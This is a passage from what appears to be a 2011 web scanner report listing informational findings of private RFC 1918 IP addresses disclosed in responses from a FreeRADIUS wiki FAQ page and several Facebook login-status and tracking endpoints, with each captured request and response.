#captcha
...[SNIP]...

21.25. http://wiki.freeradius.org/FAQ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wiki.freeradius.org
Path:   /FAQ

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /FAQ HTTP/1.1
Host: wiki.freeradius.org
Proxy-Connection: keep-alive
Referer: http://freeradius.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=74731205.2134826601.1316220336.1316220336.1316220336.1; __utmb=74731205; __utmc=74731205; __utmz=74731205.1316220336.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Fri, 16 Sep 2011 19:47:44 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 69991

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html;charset=utf-8">
<link rel="stylesheet" type="text/css" href="/css/gollum.css" media="all">
<link rel="stylesheet"
...[SNIP]...
<code>listen {
ipaddr = 192.168.1.250
port = 1817
type = auth
}
</code>
...[SNIP]...
<code>bind_address = 192.168.1.250
port = 1817
</code>
...[SNIP]...
<code>Framed-Route := "10.130.1.252/32 0.0.0.0 5",
Framed-Route += "10.130.0.252/32 0.0.0.0 10",&lt;/pre&gt;
</code>
...[SNIP]...
<code>Framed Route Attribute (22), length: 28, Value: 10.130.1.252/32 0.0.0.0 5
0x0000: 3130 2e31 3330 2e31 2e32 3532 2f33 3220
0x0010: 302e 302e 302e 3020 2035
Framed Route Attribute (22), length: 28, Value: 10.130.0.252/32 0.0.0.0 10
0x0000: 3130 2e31 3330 2e30 2e32 3532 2f33 3220
0x0010: 302e 302e 302e 3020 3130
</code>
...[SNIP]...
<code>user Cleartext-Password := "blegh"
Service-Type = Framed-User,
Framed-Protocol = PPP,
Framed-IP-Address = 192.168.5.78,
Framed-IP-Netmask = 255.255.255.240

user Cleartext-Password := "blegh"
Service-Type = Framed-User,
Framed-Protocol = PPP,
Framed-IP-Address = 192.168.5.78,
Framed-Route = "192.168.5.64/28 0.0.0.0 1"
</code>
...[SNIP]...
<p>The result is that the end user gets IP address 192.168.5.78 and that the whole network with IP addresses 192.168.5.64 - 195.64.5.79 is routed over the PPP link to the user (see the <a class="internal present" href="/RADIUS">
...[SNIP]...

21.26. http://www.facebook.com/brandlift.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /brandlift.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brandlift.php?campaign_id=FSIuAFYFAg__&creative_id=clJaAloCBF0_&placement_id=cFhXC1cGAl8_&media_type=image&content_type=fm&segment1=US&segment2=623&h=5838a9cc2c&rnd=1316221029 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://secure-us.imrworldwide.com/ocr/e?aHR0cDovL3d3dy5mYWNlYm9vay5jb20vYnJhbmRsaWZ0LnBocD9jYW1wYWlnbl9pZD1GU0l1QUZZRkFnX18mY3JlYXRpdmVfaWQ9Y2xKYUFsb0NCRjBfJnBsYWNlbWVudF9pZD1jRmhYQzFjR0FsOF8mbWVkaWFfdHlwZT1pbWFnZSZjb250ZW50X3R5cGU9Zm0mc2VnbWVudDE9VVMmc2VnbWVudDI9NjIzJmg9NTgzOGE5Y2MyYw__
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 43
Content-Type: image/gif
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.42.67.69
X-Cnection: close
Date: Sat, 17 Sep 2011 01:01:23 GMT

GIF89a.............!.......,...........D..;

21.27. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=223691147655074&app_id=223691147655074&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1aef45b1%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff324ad897%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc588f37%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff324ad897%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df240bdc78%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10d343f28%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff324ad897%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df240bdc78&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3bea919c4%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff324ad897%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df240bdc78&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df4ac030e%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff324ad897%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df240bdc78&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/star_tracks/view/20110915cameron_and_tyler_winklevoss_to_star_in_tv_ad/srvc=track&position=also
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.151.53
X-Cnection: close
Date: Sat, 17 Sep 2011 01:02:47 GMT
Content-Length: 242

<script type="text/javascript">
parent.postMessage("cb=f3bea919c4&origin=http\u00253A\u00252F\u00252Fbostonherald.com\u00252Ff324ad897&relation=parent&transport=postmessage&frame=f240bdc78", "http:\/\
...[SNIP]...

21.28. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=374095054754&app_id=374095054754&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2006977d%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff3524c18b4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df317ecb21c%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff3524c18b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df80e3e92%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfbb8b3c0%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff3524c18b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df80e3e92&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b37ed32%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff3524c18b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df80e3e92&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc7a4c5fc%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff3524c18b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df80e3e92&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM; lsd=JJyyQ

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.144.21
X-Cnection: close
Date: Sat, 17 Sep 2011 00:57:57 GMT
Content-Length: 240

<script type="text/javascript">
parent.postMessage("cb=f1b37ed32&origin=http\u00253A\u00252F\u00252Fbeta.abc.go.com\u00252Ff3524c18b4&relation=parent&transport=postmessage&frame=f80e3e92", "http:\/\/b
...[SNIP]...

21.29. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=223691147655074&app_id=223691147655074&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc6b1ce2%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff22b311d3c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2117f3a08%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff22b311d3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c5c7cfc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32aed8f04%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff22b311d3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c5c7cfc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df173d16f5c%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff22b311d3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c5c7cfc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df349c2251c%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff22b311d3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c5c7cfc&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/inside_track/view/20110907sox_with_heels/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.127.40
X-Cnection: close
Date: Sat, 17 Sep 2011 01:06:55 GMT
Content-Length: 244

<script type="text/javascript">
parent.postMessage("cb=f173d16f5c&origin=http\u00253A\u00252F\u00252Fbostonherald.com\u00252Ff22b311d3c&relation=parent&transport=postmessage&frame=f2c5c7cfc", "http:\/
...[SNIP]...

21.30. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=223691147655074&app_id=223691147655074&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f61270a4%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff1f154075c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df204ffb9c%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff1f154075c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33e31f79%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9a3bbf9c%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff1f154075c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33e31f79&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df95486a8%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff1f154075c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33e31f79&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2118ae61%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff1f154075c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33e31f79&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/columnists/view.bg?articleid=1366212
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.171.43
X-Cnection: close
Date: Sat, 17 Sep 2011 01:01:03 GMT
Content-Length: 242

<script type="text/javascript">
parent.postMessage("cb=f95486a8&origin=http\u00253A\u00252F\u00252Fbostonherald.com\u00252Ff1f154075c&relation=parent&transport=postmessage&frame=f33e31f79", "http:\/\/
...[SNIP]...

21.31. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=127075842605&app_id=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d93db198%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff88b87154%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f2ded9fc%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff88b87154%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df355a5764%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ae3bf87c%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff88b87154%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df355a5764&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2130c3218%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff88b87154%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df355a5764&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a36cbe84%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff88b87154%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df355a5764&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM; lsd=JJyyQ

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.191.77
X-Cnection: close
Date: Sat, 17 Sep 2011 01:01:58 GMT
Content-Length: 232

<script type="text/javascript">
parent.postMessage("cb=f2130c3218&origin=http\u00253A\u00252F\u00252Fwww.tmz.com\u00252Ff88b87154&relation=parent&transport=postmessage&frame=f355a5764", "http:\/\/www.
...[SNIP]...

21.32. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=127075842605&app_id=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df98e6f72c%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff30d8dd9c8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17c09bf9%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff30d8dd9c8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42aa0ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ed48f184%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff30d8dd9c8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42aa0ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d4e3daa4%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff30d8dd9c8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42aa0ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df66219778%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff30d8dd9c8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42aa0ec&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.16.55
X-Cnection: close
Date: Sat, 17 Sep 2011 00:54:45 GMT
Content-Length: 233

<script type="text/javascript">
parent.postMessage("cb=f2d4e3daa4&origin=http\u00253A\u00252F\u00252Fwww.tmz.com\u00252Ff30d8dd9c8&relation=parent&transport=postmessage&frame=f42aa0ec", "http:\/\/www.
...[SNIP]...

21.33. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=169076986451072&app_id=169076986451072&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd4d71bc%26origin%3Dhttp%253A%252F%252Fblekko.com%252Ff37c8a3364%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa60061%26origin%3Dhttp%253A%252F%252Fblekko.com%252Ff37c8a3364%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39c2ac50c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df383e39aa%26origin%3Dhttp%253A%252F%252Fblekko.com%252Ff37c8a3364%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39c2ac50c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df12030bc5%26origin%3Dhttp%253A%252F%252Fblekko.com%252Ff37c8a3364%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39c2ac50c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32f528b9%26origin%3Dhttp%253A%252F%252Fblekko.com%252Ff37c8a3364%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39c2ac50c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/radius+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.30.39
X-Cnection: close
Date: Fri, 16 Sep 2011 19:44:23 GMT
Content-Length: 232

<script type="text/javascript">
parent.postMessage("cb=f12030bc5&origin=http\u00253A\u00252F\u00252Fblekko.com\u00252Ff37c8a3364&relation=parent&transport=postmessage&frame=f39c2ac50c", "http:\/\/blek
...[SNIP]...

21.34. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=127075842605&app_id=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30e9c6e5%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff3ef52693c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3162cda54%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff3ef52693c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df4b8e2fb4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3f4abab4c%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff3ef52693c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df4b8e2fb4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2038697d8%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff3ef52693c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df4b8e2fb4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ec6176bc%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff3ef52693c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df4b8e2fb4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.133.51
X-Cnection: close
Date: Sat, 17 Sep 2011 00:55:55 GMT
Content-Length: 234

<script type="text/javascript">
parent.postMessage("cb=f2038697d8&origin=http\u00253A\u00252F\u00252Fwww.tmz.com\u00252Ff3ef52693c&relation=parent&transport=postmessage&frame=f4b8e2fb4", "http:\/\/www
...[SNIP]...

21.35. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

